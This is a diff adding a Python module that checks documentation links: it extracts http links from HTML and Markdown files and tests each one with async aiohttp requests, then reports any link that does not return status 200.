+"""Python file import analyzer."""
+from collections import defaultdict, namedtuple
+from pathlib import Path
+from typing import Dict, Set, Optional, Iterable
+from urllib import parse
+
+import asyncio
+import markdown
+from bs4 import BeautifulSoup
+from aiohttp import ClientSession, ClientResponseError, ClientConnectionError
+
+
+# pylint: disable=relative-beyond-top-level
+# from . import VERSION
+
+# __version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+UrlResult = namedtuple("UrlResult", "status, history, url, message")
+
+
+def check_docs(
+    doc_path: str, recurse: bool = True, max_threads: int = 10, delay: float = 0
+) -> Dict[str, Dict[str, UrlResult]]:
+    """
+    Check multiple HTML files in `doc_path`.
+
+    Parameters
+    ----------
+    doc_path : str
+        Path
+    recurse: bool
+        If True, recurse subfolders, default is True
+    max_threads: int, optional
+        The maximum number of async threads to run
+    delay: float, optional
+        Seconds delay between requests
+
+    Returns
+    -------
+    Dict[str, Dict[str, UrlResult]]
+        Dictionary of pages checked. Results for each page
+        is a dictionary of checked links for the page.
+
+    """
+    page_results: Dict[str, Dict[str, UrlResult]] = defaultdict(dict)
+    link_results: Dict[str, UrlResult] = {}
+
+    links_to_check = _get_links_from_files(doc_path, recurse)
+    print(f"Checking links {len(links_to_check)}...")
+    checked_links = check_uris(links_to_check, max_threads, delay)
+    print("\ndone")
+    for result in checked_links:
+        link_results[result.url] = result
+        src_pages = links_to_check[result.url]
+        for src_page in src_pages:
+            page_results[src_page][result.url] = result
+
+    _print_url_results(page_results)
+    return page_results
+
+
+# pyline: disable=broad-except
+def _get_links_from_files(doc_path: str, recurse: bool = True) -> Dict[str, Set[str]]:
+    links_to_check: Dict[str, Set[str]] = defaultdict(set)
+
+    html_glob_pattern = "**/*.html" if recurse else "*.html"
+    all_files = list(Path(doc_path).glob(html_glob_pattern))
+    md_glob_pattern = "**/*.md" if recurse else "*.md"
+    md_files = list(Path(doc_path).glob(md_glob_pattern))
+    all_files.extend(md_files)
+    print(f"reading {len(all_files)} files...")
+    for file_name in all_files:
+        pg_links = _get_doc_links(file_name)
+        page = str(file_name.relative_to(Path(doc_path)))
+        for link in pg_links:
+            links_to_check[link].add(page)
+
+    return links_to_check
+
+
+def _get_doc_links(doc_path: Path) -> Set[str]:
+    """
+    Check links in an HTML or Markdown document.
+
+    Parameters
+    ----------
+    doc_path : str
+        Path to the document
+
+    Returns
+    -------
+    Set[str]
+        Set of links
+
+    """
+    html_content = None
+    try:
+        html_content = doc_path.read_text(encoding="utf-8")
+    except UnicodeDecodeError:
+        html_content = doc_path.read_text(encoding="mbcs")
+    if doc_path.suffix.casefold() == ".md":
+        html_content = markdown.markdown(html_content)
+    soup = BeautifulSoup(html_content, "html.parser")
+    links = soup.find_all("a")
+
+    links = {link.get("href") for link in links}
+    links = {link for link in links if link.casefold().startswith("http")}
+    return links
+
+
+def _resolve_rel_link(
+    url_link: str, all_links: bool, page_url: str, top_root: str
+) -> Optional[str]:
+    if url_link[0:4] == "http":
+        if all_links or (top_root.lower() not in url_link.lower()):
+            return url_link
+    else:
+        if url_link.startswith("#"):
+            # don't follow fragments
+            return None
+        url_link = parse.urljoin(page_url, url_link)
+        if all_links:
+            return url_link
+    return None
+
+
+def check_uris(
+    uris_to_check: Iterable[str], max_threads: int = 10, delay: float = 0
+) -> Iterable[UrlResult]:
+    """
+    Check URIs.
+
+    Parameters
+    ----------
+    uris_to_check : Iterable[str]
+        Iterable of URI strings
+    max_threads: int, optional
+        The maximum number of async threads to run
+    delay: float, optional
+        Seconds delay between requests
+
+    Returns
+    -------
+    Iterable[UrlResult]
+        Iterable of UrlResults
+
+    """
+    loop = asyncio.get_event_loop()
+
+    future = asyncio.ensure_future(_check_uris_async(uris_to_check, max_threads, delay))
+    return loop.run_until_complete(future)
+
+
+async def _check_url_async(url: str, session: ClientSession) -> UrlResult:
+    """
+    Connect to URL and return response status.
+
+    Parameters
+    ----------
+    url : str
+        URL to check
+    session : ClientSession
+        aiohttp client session
+
+    Returns
+    -------
+    UrlResult
+        Tuple of status code, redirect history, requested url,
+        status/error message.
+
+    """
+    try:
+        async with session.get(url) as resp:
+            try:
+                await resp.read()
+                if resp.history:
+                    result = UrlResult(
+                        resp.status,
+                        resp.history,
+                        url,
+                        "No error. Redirect to " + str(resp.url),
+                    )
+                elif resp.status == 200:
+                    result = UrlResult(
+                        resp.status, resp.history, url, "No error. No redirect."
+                    )
+                else:
+                    result = UrlResult(resp.status, resp.history, url, "Error?")
+            except ClientResponseError as client_err:
+                return UrlResult(client_err.status, [], url, client_err)
+    except ClientConnectionError as err:
+        result = UrlResult(404, [], url, err)
+    return result
+
+
+async def _check_uri_with_sem_async(sem, url, session) -> Iterable[UrlResult]:
+    # Getter function with semaphore.
+    async with sem:
+        return await _check_url_async(url, session)
+
+
+async def _check_uris_async(
+    links_to_check: Iterable[str], max_threads: int = 10, delay: float = 0
+) -> Iterable[UrlResult]:
+    tasks = []
+    # create instance of Semaphore
+    sem = asyncio.Semaphore(max_threads)
+
+    # Create client session that will ensure we dont open new connection
+    # per each request.
+    async with ClientSession() as session:
+        for uri in links_to_check:
+            if delay:
+                asyncio.sleep(delay)
+            # pass Semaphore and session to every GET request
+            task = asyncio.ensure_future(_check_uri_with_sem_async(sem, uri, session))
+            tasks.append(task)
+
+        results = await asyncio.gather(*tasks)
+        return results
+
+
+def _print_url_results(results: Dict[str, Dict[str, UrlResult]]):
+    """
+    Print results of any URLs that did not return 200 status.
+
+    Parameters
+    ----------
+    results : Dict[str, Dict[str, UrlResult]]
+        List of URLs checks to print.
+
+    """
+    print("\n\nResults")
+
+    # non-200s
+    print("\n==========\nERRORS")
+    for page, result_dict in results.items():
+        page_errors = []
+        for result in result_dict.values():
+            if result.status != 200:
+                page_errors.append(f"{result.status} - {result.url}")
+        if page_errors:
+            print(f"Document {page}")
+            for err in page_errors:
+                print(err)
+
+
+# if __name__ == "__main__":
+#     t_results = check_docs("..//..")